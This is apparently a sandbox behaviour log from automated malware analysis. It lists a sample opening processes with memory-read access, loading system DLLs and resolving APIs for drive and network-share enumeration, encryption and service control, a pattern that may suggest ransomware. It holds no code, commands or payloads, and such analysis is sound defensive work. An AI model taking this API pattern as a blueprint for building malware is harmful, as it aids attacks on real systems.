Open c:\program files (x86)\google\recommends.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\fitting attachment.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\garmin.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\vt-lives.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows portable devices\gentleman.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\lexmark_increases_problems.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft synchronization services\accessing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft analysis services\bottles comics links.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows portable devices\swissebooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\dependent programs keith.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\pages_hack_associates.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows mail\keno.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\ci helicopter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\texas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\owners.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\linear ratios.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\columbus_rats_trailer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (317)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74a70000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74a30000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74a90000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x749c0000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x74900000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74a72dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74a72f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74a73058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74a326e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
